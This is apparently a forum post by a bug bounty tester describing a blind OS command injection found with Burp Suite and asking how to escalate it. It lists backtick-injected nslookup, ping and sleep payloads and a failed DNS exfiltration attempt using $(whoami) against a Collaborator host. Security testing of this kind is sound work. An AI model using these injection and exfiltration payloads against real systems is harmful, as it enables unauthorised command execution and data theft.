out-of-band data exfiltration Command Injection

A few days ago I found a vulnerability in an in-scope site using the Burp Suite scanner with the command nslookup xxx.burpcolaborator.com, reported with the following details:

Issue: OS command injection 
Severity: High 
Confidence: Certain

The vulnerability only responds when using "`" and only responds to the nslookup, sleep and ping binaries, including the Burp Collaborator.

These are the only commands it responds to:

  • nslookup xxx.burpcolaborator.com

  • ping xxx.burpcolaborator.com

  • sleep 10

Other commands like nslookup $(whoami).xxx.burp collaborator.com do not give any answer. Please, I would appreciate it if you could help me with this problem, since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.